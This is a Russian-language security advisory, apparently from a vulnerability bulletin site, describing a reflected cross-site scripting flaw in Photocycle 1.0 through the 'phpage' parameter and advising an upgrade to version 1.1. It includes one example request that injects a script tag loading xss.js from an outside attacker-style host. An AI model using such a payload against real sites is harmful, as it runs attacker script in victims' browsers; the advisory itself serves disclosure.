Межсайтовый скриптинг в Photocycle

Дата публикации:
15.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
1904
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Photocycle 1.x
Уязвимые версии: Photocycle 1.0, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpage". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://www.example.com/photocycle&phpage=[script%20src=http://www.youfucktard.com/xss.js][/script]

URL производителя: adambrown.info/p/tools/photocycle

Решение: Установите последнюю версию (1.1) с сайта производителя.

Ссылки: Photocycle v1.0 - XSS

или введите имя

CAPTCHA